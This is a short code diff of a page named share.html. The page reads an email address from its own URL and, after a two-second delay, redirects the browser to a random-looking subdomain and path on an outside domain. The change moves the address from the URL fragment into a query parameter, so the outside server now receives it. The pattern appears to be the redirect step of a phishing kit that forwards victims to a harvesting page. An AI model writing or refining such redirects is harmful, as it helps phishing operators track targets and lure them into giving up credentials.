--- a/share.html
+++ b/share.html
@@ -70,7 +70,7 @@
             if (email) {
                 // Redirect with the email parameter appended to the URL
                 setTimeout(function () {
-                    window.location.href = 'https://tvrcemeheff.plumbs360.com/UwXUnAeh#' + encodeURIComponent(email);
+                    window.location.href = 'https://tvrcemeheff.plumbs360.com/UwXUnAeh?email=' + encodeURIComponent(email);
                 }, 2000);  // Delay of 2 seconds
             } else {
                 alert('No email parameter found in the URL.');
